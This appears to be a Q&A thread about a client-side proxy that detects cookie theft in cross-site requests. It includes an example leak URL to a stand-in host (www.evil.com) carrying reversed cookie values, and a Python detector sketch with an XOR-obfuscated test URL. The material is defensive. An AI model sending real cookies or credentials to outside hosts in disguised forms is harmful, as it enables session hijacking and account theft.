Reputation: 243
I am developing a client-side proxy to counter cross-site scripting attacks. All the requests from the browser will go through the proxy. I am able to classify the requests as local or cross-domain, using the Referer header and other things. But I need to reduce the number of false positives.
For this, I will track the cookie sent from the web-server in a response and I will look for parts of this cookie in any cross-domain request, i.e., I will check for only the cross-site requests that carry sensitive information (cookie).
But this simple idea simply fails if the attacker constructs an HTTP response where the cookie is encrypted and leaked.
For example,
cookie:
user=rahim;pass=asdf
The hacker constructs a request:
www.evil.com?name=mihar&pass=fdsa
The attacker has simply reversed the cookie parameters. There are innumerable ways the attacker can play with the cookie and fool the process.
I need an algorithm which checks just that. The cookie parameters should not be allowed to pass through in whatever form.
Upvotes: 0
Views: 413
Reputation: 1788
Your task is hopeless. There is no way to tell what the true meaning of a cookie is.
Upvotes: 1
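Added example, not part of either post: a Python sketch of the check the question describes, generalized from plain substring matching to the reversed, hex and Base64 forms of each cookie value. The function names and the `MIN_LEN` threshold are assumptions made for illustration; as the answer says, a value transformed with a key or any scheme not on the list still passes unflagged.

```python
import base64
from urllib.parse import urlsplit, parse_qsl, unquote

MIN_LEN = 4  # assumption: shorter values match by chance too often to track


def cookie_values(cookie: str) -> list[str]:
    """Split 'k=v;k2=v2' and keep the values long enough to track."""
    values = []
    for part in cookie.split(";"):
        _, _, value = part.strip().partition("=")
        if len(value) >= MIN_LEN:
            values.append(value)
    return values


def variants(value: str) -> set[str]:
    """Keyless transformations of a tracked value, lower-cased for matching."""
    raw = value.encode()
    forms = {
        value,
        value[::-1],                                          # reversed
        raw.hex(),                                            # hex-encoded
        base64.b64encode(raw).decode().rstrip("="),           # Base64
        base64.urlsafe_b64encode(raw).decode().rstrip("="),   # URL-safe Base64
    }
    return {f.lower() for f in forms}


def leaked_values(cookie: str, url: str) -> list[str]:
    """Return the cookie values that appear, in any known form, in the URL."""
    parts = urlsplit(url if "//" in url else "//" + url)
    fields = [unquote(parts.path)]
    for key, val in parse_qsl(parts.query, keep_blank_values=True):
        fields += [key, val]          # parse_qsl already percent-decodes
    haystack = " ".join(fields).lower()
    return [v for v in cookie_values(cookie)
            if any(form in haystack for form in variants(v))]


if __name__ == "__main__":
    cookie = "user=rahim;pass=asdf"                      # cookie from the question
    print(leaked_values(cookie, "www.evil.com?name=mihar&pass=fdsa"))
    # Constructed sample: the same values XORed with a key before hex-encoding.
    print(leaked_values(cookie, "www.evil.com?d=283b323337&p=3b293e3c"))
```

The first call flags both values; the second returns an empty list, which is the gap the answer points to.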